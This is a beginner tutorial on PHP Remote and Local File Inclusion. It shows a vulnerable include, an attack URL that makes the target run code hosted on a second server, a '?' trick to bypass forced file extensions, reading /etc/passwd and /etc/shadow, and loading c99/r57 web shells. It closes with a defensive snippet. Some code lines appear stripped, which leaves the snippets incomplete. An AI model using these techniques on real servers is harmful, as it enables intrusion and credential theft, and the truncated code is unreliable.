Remote File Inclusion, or, RFI, may sound hard, but it's basically very easy. The title itself
already explains a bit about it. You will basically include a file on a server, which is hosted
on an other server. With RFI, you use an URL-based type of 'hacking'. Of course, this will only
be possible if the server supports PHP and allows Remote URL access.
Let's make an example of a RFI. Say we have "server1.com" as vulnerable, and we have our file
hosted on "server2.com". Both server's httpd root directories are "/var/www". Server 1 has a
vulnerability in their index.php. Server 2 contains our code which we want to include on Server 1
This is how a simple (and vulnerable) inclusion should look like, which we use as example on
the index.php of Server 1:
$page = $_GET['page'];
Now before we continue with RFI, and the file on Server 2, we will first test the code on the
first server with LFI (Local File Inclusion), which is the same as RFI, only this method uses
files which are hosted on the current (local) server, not a remote server. This method is often
used in Linux to get "/etc/passwd" and sometimes "/etc/shadow".
We will now create an other file on Server 1, which we will call "test.txt". This file will only
contain the following:
echo "Hello, this is a test.";
Now we can test our inclusion on Server 1. We will include "test.txt" to see if it's working.
An inclusion looks like "index.php?page=file", since we use "$page" and "$_GET['page']". so the
URL will be:
If it works, you should see the text on the page, which will be:
Hello, this is a test.
If you did not create the test.txt, or if it's just not there, you should see the following error:
Warning: main(test.txt) [function.main]: failed to open stream: No such file or directory in
/var/www/index.php on line 1
Remember that some servers have URL access disabled. This makes it impossible to include external
(or Remote) files. This means you can not use "http://" or "ftp://" in an inclusion, but sometimes
you can still use LFI on those websites.
Ok, so now we know that the inclusion works. We can now create our file on Server 2. Let's call it
"include.txt". This file will contain the following:
echo "Your RFI seems to be working.";
Now you are ready to do your RFI. It looks like this:
http://server1.com/index.php?page= http://server2.com/include.txt
__________________________________________________ _____________
| http://server1.com/index.php?page=ht...om/include.txt |
That is how your final URL should be. If it works, you'll see the text of include.txt in the page
of Server 1. Which will be:
Your RFI seems to be working.
Now there's something you should remember, and that is that some websites already have a filetype
configured in their include script, such as:
$page = $_GET['page'];
Then if you use "index.php?page=test", it will include "test.html" on the local server. If this is
the case, then your "http://server2.com/include.txt" will not work. You can bypass this by placing
a question mark after your own URL, so it will be "http://server2.com/include.txt?". Then the URL
should look like:
What this will do is include "http://server2.com/include.txt?.html"
However, this is not all you can do with RFI. You can also include shell scripts, such as "c99"
and "r57". These scripts will allow you to execute commands or do lots of other things on the
For my own websites, I also use inclusions, but I've blocked the ability to use RFI. Here's a
little bit of code which can help you on your way to secure your own pages:
$page = $_GET['page'];
if ($page=="index") {
$page = "home";
$filename = "./" . $page .".php";
if (file_exists($filename)) {
} else {
This code will first check if the file which is requested, exists. If so, it includes it. If not,
it will simply include home.php.